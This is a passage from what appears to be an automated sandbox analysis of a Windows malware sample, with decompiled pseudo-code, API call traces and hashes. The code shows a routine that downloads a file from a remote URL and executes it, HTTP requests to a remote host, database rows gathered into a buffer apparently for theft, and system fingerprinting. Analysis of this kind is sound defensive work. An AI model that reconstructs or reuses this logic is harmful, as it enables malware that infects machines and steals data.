				_t120 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v796, _t120);
				_t101 =  *0x417090; // 0xba0508
				 *0x4179f8( &_v796, _t101);
				_t60 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v1588, _t60);
				_t122 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v1588, _t122);
				_t103 =  *0x4175f4; // 0xba0550
				 *0x4179f8( &_v1588, _t103);
				_t65 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v532, _t65);
				_t124 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v532, _t124);
				_t105 =  *0x417620; // 0xbae218
				 *0x4179f8( &_v532, _t105);
				_t70 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v1060, _t70);
				_t126 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v1060, _t126);
				_t107 =  *0x417664; // 0xbae520
				 *0x4179f8( &_v1060, _t107);
				_t75 =  *0x4172ec; // 0xba5090
				E00403D30( &_v1324, _t75);
				_t128 =  *0x417640; // 0xba50d8
				E00403D30( &_v268, _t128);
				_t109 =  *0x417220; // 0xba0528
				E00403D30( &_v796, _t109);
				_t80 =  *0x4176bc; // 0xbae358
				E00403D30( &_v1588, _t80);
				_t130 =  *0x4174a0; // 0xbae4f8
				E00403D30( &_v532, _t130);
				_t111 =  *0x4176f0; // 0xbae5e8
				E00403D30( &_v1060, _t111);
				E0040A270( &_v1324, 0x104);
				E0040A270( &_v268, 0x104);
				E0040A270( &_v796, 0x104);
				E0040A270( &_v1588, 0x104);
				E0040A270( &_v532, 0x104);
				return E0040A270( &_v1060, 0x104);
			}

0x004044b5
0x004044c6
0x004044d7
0x004044e8
0x004044f9
0x0040450a
0x0040450f
0x0040451c
0x00404522
0x00404530
0x00404536
0x00404544
0x0040454a
0x00404557
0x0040455d
0x0040456b
0x00404571
0x0040457f
0x00404585
0x00404592
0x00404598
0x004045a6
0x004045ac
0x004045ba
0x004045c0
0x004045cd
0x004045d3
0x004045e1
0x004045e7
0x004045f5
0x004045fb
0x00404608
0x0040460e
0x0040461c
0x00404622
0x00404630
0x00404636
0x00404643
0x00404649
0x00404657
0x0040465d
0x0040466b
0x00404671
0x0040467e
0x00404686
0x00404694
0x0040469c
0x004046aa
0x004046b2
0x004046bf
0x004046c7
0x004046d5
0x004046dd
0x004046eb
0x004046ff
0x00404710
0x00404721
0x00404732
0x00404743
0x0040475c

APIs

lstrcat.KERNEL32(?,00BA5250), ref: 0040451C
lstrcat.KERNEL32(?,00BAC128), ref: 00404530
lstrcat.KERNEL32(?,00BA5070), ref: 00404544
lstrcat.KERNEL32(?,00BA5250), ref: 00404557
lstrcat.KERNEL32(?,00BAC128), ref: 0040456B
lstrcat.KERNEL32(?,00BA50B8), ref: 0040457F
lstrcat.KERNEL32(?,00BA5250), ref: 00404592
lstrcat.KERNEL32(?,00BAC128), ref: 004045A6
lstrcat.KERNEL32(?,00BA0508), ref: 004045BA
lstrcat.KERNEL32(?,00BA5250), ref: 004045CD
lstrcat.KERNEL32(?,00BAC128), ref: 004045E1
lstrcat.KERNEL32(?,00BA0550), ref: 004045F5
lstrcat.KERNEL32(?,00BA5250), ref: 00404608
lstrcat.KERNEL32(?,00BAC128), ref: 0040461C
lstrcat.KERNEL32(?,00BAE218), ref: 00404630
lstrcat.KERNEL32(?,00BA5250), ref: 00404643
lstrcat.KERNEL32(?,00BAC128), ref: 00404657
lstrcat.KERNEL32(?,00BAE520), ref: 0040466B

Part of subcall function 00403D30: InternetOpenA.WININET(00413042,00000001,00000000,00000000,00000000), ref: 00403D4D

Part of subcall function 00403D30: InternetOpenUrlA.WININET(00000000,00405400,00000000,00000000,00000100,00000000), ref: 00403D7D
Part of subcall function 00403D30: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00403D9C
Part of subcall function 00403D30: InternetReadFile.WININET(00405400,?,00000400,?), ref: 00403DC5
Part of subcall function 00403D30: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DF3
Part of subcall function 00403D30: FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00403E41
Part of subcall function 00403D30: InternetCloseHandle.WININET(00405400), ref: 00403E4B
Part of subcall function 00403D30: InternetCloseHandle.WININET(00000000), ref: 00403E58

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Internet$CloseFile$HandleOpen$ChangeCreateFindNotificationReadWrite
String ID:
API String ID: 918959446-0
Opcode ID: a93399326ad1933261de41c100e3344623b73c31d0b12053b081ad1ab72bb1f4
Instruction ID: 06c7cc9fdb5b3e7ee69895b4e1280dfd41d861f6910c9e4baacc9bc7e4b0d463
Opcode Fuzzy Hash: a93399326ad1933261de41c100e3344623b73c31d0b12053b081ad1ab72bb1f4
Instruction Fuzzy Hash: 476165F6514318ABC714EBA0DC85DDA373DBB48300F0085EDB61567150DA74A7C8CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004102C0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 198
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004102C0(void* _a4, signed int* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				struct _BY_HANDLE_FILE_INFORMATION _v72;
				long _v76;
				void _v80;
				void _v84;
				void _v88;
				signed short _v92;
				signed short _v96;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr* _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t177;

				_v8 = GetFileInformationByHandle(_a4,  &_v72);
				if(_v8 == 0) {
					return 0x200;
				}
				_v16 = _v72.dwFileAttributes;
				_v12 = 0;
				if((_v16 & 0x00000001) != 0) {
					_v12 = _v12 | 0x00000001;
				}
				if((_v16 & 0x00000002) != 0) {
					_v12 = _v12 | 0x00000002;
				}
				if((_v16 & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000004;
				}
				if((_v16 & 0x00000010) != 0) {
					_v12 = _v12 | 0x00000010;
				}
				if((_v16 & 0x00000020) != 0) {
					_v12 = _v12 | 0x00000020;
				}
				if((_v16 & 0x00000010) == 0) {
					_v12 = _v12 | 0x80000000;
				} else {
					_v12 = _v12 | 0x40000000;
				}
				_v12 = _v12 | 0x01000000;
				if((_v16 & 0x00000001) == 0) {
					_v12 = _v12 | 0x00800000;
				}
				_v76 = GetFileSize(_a4, 0);
				if(_v76 > 0x28) {
					SetFilePointer(_a4, 0, 0, 0);
					ReadFile(_a4,  &_v80, 2,  &_v20, 0);
					SetFilePointer(_a4, 0x24, 0, 0);
					ReadFile(_a4,  &_v84, 4,  &_v20, 0);
					if((_v80 & 0x0000ffff) == 0x54ad && _v76 > _v84 + 0x34) {
						SetFilePointer(_a4, _v84, 0, 0);
						ReadFile(_a4,  &_v88, 4,  &_v20, 0);
						if(_v88 == 0x5a4d || _v88 == 0x454e || _v88 == 0x454c || _v88 == 0x4550) {
							_v12 = _v12 | 0x00400000;
						}
					}
				}
				if(_a8 != 0) {
					 *_a8 = _v12;
				}
				if(_a12 != 0) {
					 *_a12 = _v76;
				}
				if(_a16 != 0) {
					_t161 = _v72.ftLastAccessTime;
					_t103 = E004101D0(_t161, _v56);
					_t138 = _a16;
					 *_t138 = _t103;
					 *((intOrPtr*)(_t138 + 4)) = _t161;
					_t162 = _v48;
					_t105 = E004101D0(_v72.ftLastWriteTime, _t162);
					_t139 = _a16;
					 *((intOrPtr*)(_t139 + 8)) = _t105;
					 *((intOrPtr*)(_t139 + 0xc)) = _t162;
					_t163 = _v64;
					_t107 = E004101D0(_v72.ftCreationTime, _t163);
					_t177 = _t177 + 0x18;
					_t140 = _a16;
					 *((intOrPtr*)(_t140 + 0x10)) = _t107;
					 *((intOrPtr*)(_t140 + 0x14)) = _t163;
				}
				if(_a20 != 0) {
					E00410210(_v72.ftLastWriteTime, _v48,  &_v96,  &_v92);
					 *_a20 = _v92 & 0x0000ffff | (_v96 & 0x0000ffff) << 0x00000010;
				}
				return 0;
			}

0x004102d4
0x004102db
0x00000000
0x004102dd
0x004102ea
0x004102ed
0x004102fa
0x00410302
0x00410302
0x0041030b
0x00410313
0x00410313
0x0041031c
0x00410324
0x00410324
0x0041032d
0x00410335
0x00410335
0x0041033e
0x00410346
0x00410346
0x0041034f
0x00410367
0x00410351
0x0041035a
0x0041035a
0x00410373
0x0041037c
0x00410388
0x00410388
0x00410397
0x0041039e
0x004103ae
0x004103c4
0x004103d4
0x004103ea
0x004103fa
0x00410413
0x00410429
0x00410436
0x0041045c
0x0041045c
0x00410436
0x004103fa
0x00410463
0x0041046b
0x0041046b
0x00410471
0x00410479
0x00410479
0x0041047f
0x00410485
0x00410489
0x00410491
0x00410494
0x00410496
0x00410499
0x004104a1
0x004104a9
0x004104ac
0x004104af
0x004104b2
0x004104ba
0x004104bf
0x004104c2
0x004104c5
0x004104c8
0x004104c8
0x004104cf
0x004104e1
0x004104f9
0x004104f9
0x00000000

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 004102CE
GetFileSize.KERNEL32(00000000,00000000), ref: 00410391
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004103AE
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 004103C4
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 004103D4
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004103EA
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00410413

Strings

(, xrefs: 0041039A
PE, xrefs: 0041044A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 901bdc8b58a582e246fc2e9b92f9c12a5358e4987fdd03c3527d23f99d31a130
Instruction ID: 5139523200f09add25a428fbb69fee2cdf8f5e6b7283e9778ce579f20013b39a
Opcode Fuzzy Hash: 901bdc8b58a582e246fc2e9b92f9c12a5358e4987fdd03c3527d23f99d31a130
Instruction Fuzzy Hash: 32811AB1D10208AFEB14CFD8D895BEEBBB5FB48300F14C05AE615AB294D7749AC5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 15.1, APIs: 10, Instructions: 101
networkfilestringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00404320(void* __ecx, char* _a4, char* _a8, char* _a12) {
				char _v2004;
				void* _v2008;
				void _v2012;
				void* _v2016;
				void* _v2020;
				void _v4020;
				int _v4024;
				long _v4028;
				void* _t63;

				_t51 = __ecx;
				E0040A230(__ecx,  &_v2004, 0, 0x7d0);
				_v2008 = InternetOpenA(0x413042, 0, 0, 0, 0);
				if(_v2008 != 0) {
					_v2012 = 0x927c0;
					InternetSetOptionA(_v2008, 6,  &_v2012, 4);
					_v2016 = InternetConnectA(_v2008, _a4, 0x50, 0, 0, 3, 0, 0);
					if(_v2016 != 0) {
						_v2020 = HttpOpenRequestA(_v2016, _a12, _a8, 0, 0, 0, 0x400000, 0);
						if(_v2020 != 0 && HttpSendRequestA(_v2020, 0, 0, 0, 0) != 0) {
							while(1) {
								_v4024 = InternetReadFile(_v2020,  &_v4020, 0x7cf,  &_v4028);
								if(_v4024 == 0) {
									break;
								}
								_t71 = _v4028;
								if(_v4028 != 0) {
									 *((char*)(_t63 + _v4028 - 0xfb0)) = 0;
									 *0x4179f8( &_v2004,  &_v4020);
									continue;
								}
								break;
							}
						}
						InternetCloseHandle(_v2020);
					}
					_t51 = _v2016;
					InternetCloseHandle(_v2016);
				}
				InternetCloseHandle(_v2008);
				return E00403BE0(_t51, _t71,  &_v2004);
			}

0x00404320
0x00404337
0x0040434f
0x0040435c
0x00404362
0x0040437e
0x004043a1
0x004043ae
0x004043d6
0x004043e3
0x004043fe
0x0040441e
0x0040442b
0x00000000
0x00000000
0x0040442d
0x00404434
0x0040443e
0x00404454
0x00000000
0x00404454
0x00000000
0x00404434
0x00404436
0x00404463
0x00404463
0x00404469
0x00404470
0x00404470
0x0040447d
0x00404495

APIs

InternetOpenA.WININET(00413042,00000000,00000000,00000000,00000000), ref: 00404349
InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040437E
InternetConnectA.WININET(00000000,00BAC218,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040439B
HttpOpenRequestA.WININET(00000000,0040546B,00BAC128,00000000,00000000,00000000,00400000,00000000), ref: 004043D0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004043F4
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404418
lstrcat.KERNEL32(?,00000000), ref: 00404454
InternetCloseHandle.WININET(00000000), ref: 00404463
InternetCloseHandle.WININET(00000000), ref: 00404470
InternetCloseHandle.WININET(00000000), ref: 0040447D

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileOptionReadSendlstrcat
String ID:
API String ID: 2712982081-0
Opcode ID: 98d85000f3641736751d852d511307adfbe08d19a5358dab85e0b619680e28de
Instruction ID: bdb15ac633196af9a30e32a978a0bdcec5fc5186038768b2e06e6295481884f7
Opcode Fuzzy Hash: 98d85000f3641736751d852d511307adfbe08d19a5358dab85e0b619680e28de
Instruction Fuzzy Hash: A34136B1A48354ABEB30DB50CC49FAAB778EF48701F5041E9B609765C0D7B87A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404B80, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404B80(void* __eflags, char _a4) {
				char* _v8;
				char _v276;
				char _v540;
				char _v804;
				char* _v808;
				char* _v836;
				intOrPtr _v840;
				char* _v844;
				char* _v848;
				char* _v852;
				intOrPtr _v856;
				char* _v860;
				char* _v864;
				char _v868;
				char* _v872;
				char* _t44;
				char* _t52;
				intOrPtr _t81;
				void* _t84;
				void* _t85;

				_t1 =  &_a4; // 0x405527
				_t44 = strtok( *_t1, "|");
				_t85 = _t84 + 8;
				_v808 = _t44;
				_v8 = 1;
				E0040A270( &_v540, 0x104);
				E0040A270( &_v804, 0x104);
				E0040A270( &_v276, 0x104);
				while(_v808 != 0) {
					_v872 = _v8;
					if(_v872 == 1) {
						 *0x4179f8( &_v540, _v808);
					} else {
						if(_v872 == 2) {
							 *0x4179f8( &_v804, _v808);
						} else {
							if(_v872 == 3) {
								 *0x4179f8( &_v276, _v808);
								E00403D30( &_v540,  &_v804);
								_t85 = _t85 + 8;
								E0040A230( &_v868,  &_v868, 0, 0x3c);
								_v868 = 0x3c;
								_v864 = 0;
								_v860 = 0;
								_t81 =  *0x417684; // 0xba3cb0
								_v856 = _t81;
								_v852 =  &_v804;
								_v848 =  &_v276;
								_v844 = 0;
								_v840 = 5;
								_v836 = 0;
								 *0x417a50( &_v868);
								E0040A230( &_v276,  &_v868, 0, 0x3c);
								E0040A270( &_v804, 0x104);
								E0040A270( &_v276, 0x104);
								E0040A270( &_v540, 0x104);
								_v8 = 0;
							}
						}
					}
					_v8 =  &(_v8[1]);
					_t52 = strtok(0, "|");
					_t85 = _t85 + 8;
					_v808 = _t52;
				}
				return E0040A270( &_v808, 4);
			}

0x00404b8e
0x00404b92
0x00404b98
0x00404b9b
0x00404ba1
0x00404bb4
0x00404bc5
0x00404bd6
0x00404bdb
0x00404beb
0x00404bf8
0x00404c1f
0x00404bfa
0x00404c01
0x00404c38
0x00404c03
0x00404c0a
0x00404c51
0x00404c65
0x00404c6a
0x00404c78
0x00404c7d
0x00404c87
0x00404c91
0x00404c9b
0x00404ca1
0x00404cad
0x00404cb9
0x00404cbf
0x00404cc9
0x00404cd3
0x00404ce4
0x00404cf5
0x00404d06
0x00404d17
0x00404d28
0x00404d2d
0x00404d2d
0x00404c0a
0x00404c01
0x00404d3a
0x00404d44
0x00404d4a
0x00404d4d
0x00404d4d
0x00404d69

APIs

strtok.MSVCRT ref: 00404B92
lstrcat.KERNEL32(?,00000000), ref: 00404C1F
lstrcat.KERNEL32(?,00000000), ref: 00404C38
strtok.MSVCRT ref: 00404D44

Strings

<, xrefs: 00404C7D
'U@, xrefs: 00404B8E, 00404B91

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcatstrtok
String ID: 'U@$<
API String ID: 1040823752-3876449144
Opcode ID: 84a8e21b356b667c17d4a535a51f4247150e2b753455758990d3596ba8ea5e58
Instruction ID: 0261cd62c8bf9494dab5bab64d058c44b5bca0174ab74088d2d3fba9684651bc
Opcode Fuzzy Hash: 84a8e21b356b667c17d4a535a51f4247150e2b753455758990d3596ba8ea5e58
Instruction Fuzzy Hash: 80415DB1804318ABDB26DF50CC45FDE77B8BB48305F4445EEA20976290D7799B88CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004066C0, Relevance: 13.6, APIs: 9, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004066C0(intOrPtr _a4) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t22;
				struct HINSTANCE__* _t24;
				CHAR* _t27;
				CHAR* _t35;
				CHAR* _t36;
				struct HINSTANCE__* _t37;
				CHAR* _t38;
				struct HINSTANCE__* _t39;
				intOrPtr _t41;
				CHAR* _t42;
				struct HINSTANCE__* _t43;
				CHAR* _t44;
				struct HINSTANCE__* _t45;

				if(_a4 == 0) {
					return 0;
				}
				_t15 =  *0x417034; // 0xbb2cf0
				_v8 = getenv(_t15);
				if(_v8 != 0) {
					_push(0);
					_push(_a4);
					_v12 = E0040AA00(_a4, _v8, ";");
					_push(0);
					_t41 =  *0x417744; // 0xbb2e70
					_putenv(E0040AA00(_t41, _t41, _v12));
					_v16 = _v12;
					E0040A100(_v16);
				}
				_t35 =  *0x4176bc; // 0xbae358
				 *0x417814 = LoadLibraryA(_t35);
				if( *0x417814 != 0) {
					_t42 =  *0x4172ac; // 0xbbbc60
					_t19 =  *0x417814; // 0x0
					 *0x41780c = GetProcAddress(_t19, _t42);
					_t36 =  *0x417618; // 0xbbbd50
					_t43 =  *0x417814; // 0x0
					 *0x417830 = GetProcAddress(_t43, _t36);
					_t22 =  *0x4171b4; // 0xbb9590
					_t37 =  *0x417814; // 0x0
					 *0x4177dc = GetProcAddress(_t37, _t22);
					_t44 =  *0x41712c; // 0xbbbdb0
					_t24 =  *0x417814; // 0x0
					 *0x417804 = GetProcAddress(_t24, _t44);
					_t38 =  *0x4177a4; // 0xbb9470
					_t45 =  *0x417814; // 0x0
					 *0x417818 = GetProcAddress(_t45, _t38);
					_t27 =  *0x417354; // 0xbbbc78
					_t39 =  *0x417814; // 0x0
					 *0x4177fc = GetProcAddress(_t39, _t27);
				}
				if( *0x41780c == 0 ||  *0x417830 == 0 ||  *0x4177dc == 0 ||  *0x417818 == 0 ||  *0x4177fc == 0 ||  *0x417804 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				return _v20;
			}

0x004066ca
0x00000000
0x0040682f
0x004066d0
0x004066df
0x004066e6
0x004066e8
0x004066ed
0x004066ff
0x00406702
0x00406708
0x00406718
0x00406724
0x0040672b
0x00406730
0x00406733
0x00406740
0x0040674c
0x00406752
0x00406759
0x00406765
0x0040676a
0x00406771
0x0040677e
0x00406783
0x00406789
0x00406796
0x0040679b
0x004067a2
0x004067ae
0x004067b3
0x004067ba
0x004067c7
0x004067cc
0x004067d2
0x004067df
0x004067df
0x004067eb
0x00406823
0x0040681a
0x0040681a
0x0040681a
0x00000000

APIs

getenv.MSVCRT ref: 004066D6
_putenv.MSVCRT ref: 00406718
LoadLibraryA.KERNEL32(00BAE358), ref: 0040673A
GetProcAddress.KERNEL32(00000000,00BBBC60), ref: 0040675F
GetProcAddress.KERNEL32(00000000,00BBBD50), ref: 00406778
GetProcAddress.KERNEL32(00000000,00BB9590), ref: 00406790
GetProcAddress.KERNEL32(00000000,00BBBDB0), ref: 004067A8
GetProcAddress.KERNEL32(00000000,00BB9470), ref: 004067C1
GetProcAddress.KERNEL32(00000000,00BBBC78), ref: 004067D9

Part of subcall function 0040AA00: new[].LIBCMTD ref: 0040AA60

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad_putenvgetenvnew[]
String ID:
API String ID: 1997414909-0
Opcode ID: d5c4c0b673f0e356a915f398bce95c92168ee89d38d8b9277a750dcf5dab017c
Instruction ID: e4a84da2236d80776768af41a0702f2ae104ddce72670aec188a3f419c9e12c9
Opcode Fuzzy Hash: d5c4c0b673f0e356a915f398bce95c92168ee89d38d8b9277a750dcf5dab017c
Instruction Fuzzy Hash: F941F6B5909200AFD714EFA8ED48BEA7BF4E748304F04C47AE50A972A0D7389954CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00408130, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408130(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040A270( &_v268, 0x104);
				_t30 =  *0x417408; // 0xbb9650
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x417820(_a4,  &_v272);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41708c; // 0xbab2b0
					_t35 =  *0x4177d8(_v272, _t67, 0xffffffff,  &_v276, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x4177f8(_v276);
						return  *0x417824(_v272);
					}
					_v280 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x4177f4(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x417810(_v276, 0);
						_t48 =  *0x417810(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x4179f8(_v280, _v288);
						 *0x4179f8(_v280, "\t");
						 *0x4179f8(_v280, _v284);
						 *0x4179f8(_v280, "\n");
					}
					E00412380(_a16,  &_v268, _v280,  *0x4178e4(_v280));
					_t76 = _t79 + 0x10;
					E0040A270( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00408145
0x00408152
0x0040815f
0x00408173
0x00408179
0x0040817e
0x0040818f
0x0040819d
0x004081a3
0x004081a8
0x00408298
0x0040829f
0x00000000
0x004082b5
0x004081c2
0x004081c8
0x004081cf
0x004081d5
0x004081db
0x00000000
0x00000000
0x004081f3
0x00408202
0x00408208
0x0040820b
0x0040821f
0x00408231
0x00408245
0x00408257
0x00408257
0x00408282
0x00408287
0x00408293
0x00000000
0x00408293
0x004082bb

APIs

wsprintfA.USER32 ref: 0040815F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004081B5
RtlAllocateHeap.NTDLL(00000000), ref: 004081BC
lstrcat.KERNEL32(?,?), ref: 0040821F
lstrcat.KERNEL32(?,00416BB4), ref: 00408231
lstrcat.KERNEL32(?,?), ref: 00408245
lstrcat.KERNEL32(?,004165A0), ref: 00408257
lstrlen.KERNEL32(?), ref: 00408269

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: c29340cfedfdacddab23a6b8398ff943f1ec79cf75629976511fe705250eb593
Instruction ID: 3f42869ad20bce28aaee04962520a4d5b2c17a62a63a4cacbe819fdeb1681ea9
Opcode Fuzzy Hash: c29340cfedfdacddab23a6b8398ff943f1ec79cf75629976511fe705250eb593
Instruction Fuzzy Hash: 8741C9B1944218ABCB14EFA4DC4AFDA7778AF48700F0085E8F719D7240D6759E90CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405110, Relevance: 10.6, APIs: 7, Instructions: 129
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00405110(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v5548;
				char _v5812;
				char* _v5816;
				signed int _v5820;
				char* _t56;
				char* _t58;
				void* _t76;
				void* _t77;

				E00412560(0x16b8, __ecx);
				E0040A270( &_v5548, 0x1388);
				E0040A270( &_v540, 0x104);
				E0040A270( &_v5812, 0x104);
				E0040A270( &_v276, 0x104);
				 *0x4179f8( &_v5548, _a4);
				_t56 = strtok( &_v5548, "|");
				_t77 = _t76 + 8;
				_v5816 = _t56;
				_v8 = 1;
				while(_v5816 != 0) {
					_v5820 = _v8;
					_v5820 = _v5820 - 1;
					if(_v5820 <= 4) {
						switch( *((intOrPtr*)(_v5820 * 4 +  &M00405314))) {
							case 0:
								E0040A270( &_v540, 0x104);
								_push(_v5816);
								_push( &_v540);
								 *0x4179f8();
								goto L12;
							case 1:
								__ecx = _v5816;
								_v544 = E0040A1A0(_v5816, _v5816);
								goto L12;
							case 2:
								E0040A270( &_v5812, 0x104) = _v5816;
								_push(_v5816);
								__ecx =  &_v5812;
								_push( &_v5812);
								__eax =  *0x4179f8();
								goto L12;
							case 3:
								E0040A270( &_v276, 0x104) = _v5816;
								_push(_v5816);
								__ecx =  &_v276;
								_push( &_v276);
								__eax =  *0x4179f8();
								goto L12;
							case 4:
								_push("0");
								_push(_v5816);
								__eflags =  *0x417a20();
								if(__eflags != 0) {
									__eax =  &_v276;
									__ecx =  &_v5812;
									 &_v540 = E00404F50( &_v5812, __eflags,  &_v540, _v544,  &_v5812,  &_v276, 1, _a8);
								} else {
									__eax = _a8;
									__ecx =  &_v276;
									__eax = _v544;
									__ecx =  &_v540;
									__eax = E00404F50( &_v540, __eflags,  &_v540, _v544,  &_v5812,  &_v276, 0, _a8);
								}
								_v8 = 0;
								goto L12;
						}
					}
					L12:
					_v8 =  &(_v8[1]);
					_t58 = strtok(0, "|");
					_t77 = _t77 + 8;
					_v5816 = _t58;
				}
				return E0040A270( &_v5548, 0x1388);
			}

0x00405118
0x00405129
0x0040513a
0x0040514b
0x0040515c
0x0040516c
0x0040517e
0x00405184
0x00405187
0x0040518d
0x00405194
0x004051a4
0x004051b3
0x004051c0
0x004051cc
0x00000000
0x004051df
0x004051ea
0x004051f1
0x004051f2
0x00000000
0x00000000
0x004051fd
0x0040520c
0x00000000
0x00000000
0x00405228
0x0040522e
0x0040522f
0x00405235
0x00405236
0x00000000
0x00000000
0x00405252
0x00405258
0x00405259
0x0040525f
0x00405260
0x00000000
0x00000000
0x00405268
0x00405273
0x0040527a
0x0040527c
0x004052b0
0x004052b7
0x004052cc
0x0040527e
0x0040527e
0x00405284
0x00405292
0x00405299
0x004052a0
0x004052a5
0x004052d4
0x00000000
0x00000000
0x004051cc
0x004052db
0x004052e1
0x004052eb
0x004052f1
0x004052f4
0x004052f4
0x00405313

APIs

lstrcat.KERNEL32(?,?), ref: 0040516C
strtok.MSVCRT ref: 0040517E
lstrcat.KERNEL32(?,00000000), ref: 004051F2
strtok.MSVCRT ref: 004052EB

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcatstrtok
String ID:
API String ID: 1040823752-0
Opcode ID: 1daa33e91590ec7e031f3828ee8bc5e431a8a5e3de5c46c1ca3de94c01c4e3b4
Instruction ID: 0e61379a25b1a0eef2c70d9dc88a3b4c2f6e0bb542878c8b867f4fc6cd1e9075
Opcode Fuzzy Hash: 1daa33e91590ec7e031f3828ee8bc5e431a8a5e3de5c46c1ca3de94c01c4e3b4
Instruction Fuzzy Hash: E15140B1948218EBCB14DB90CC85EDE7778AF54304F1446EEB20AAB181DB759BC4CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00409CB0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409CB0() {
				int _v8;
				int _v16;
				struct HDC__* _v20;
				char _v284;
				CHAR* _t11;

				_t11 =  *0x41705c; // 0xbc4800
				_v20 = CreateDCA(_t11, 0, 0, 0);
				_v8 = GetDeviceCaps(_v20, 8);
				_v16 = GetDeviceCaps(_v20, 0xa);
				ReleaseDC(0, _v20);
				wsprintfA( &_v284, "%dx%d", _v8, _v16);
				return  &_v284;
			}

0x00409cbf
0x00409ccb
0x00409cda
0x00409ce9
0x00409cf2
0x00409d0c
0x00409d1e

APIs

CreateDCA.GDI32(00BC4800,00000000,00000000,00000000), ref: 00409CC5
GetDeviceCaps.GDI32(?,00000008), ref: 00409CD4
GetDeviceCaps.GDI32(?,0000000A), ref: 00409CE3
ReleaseDC.USER32(00000000,?), ref: 00409CF2
wsprintfA.USER32 ref: 00409D0C

Strings

%dx%d, xrefs: 00409D00

Memory Dump Source

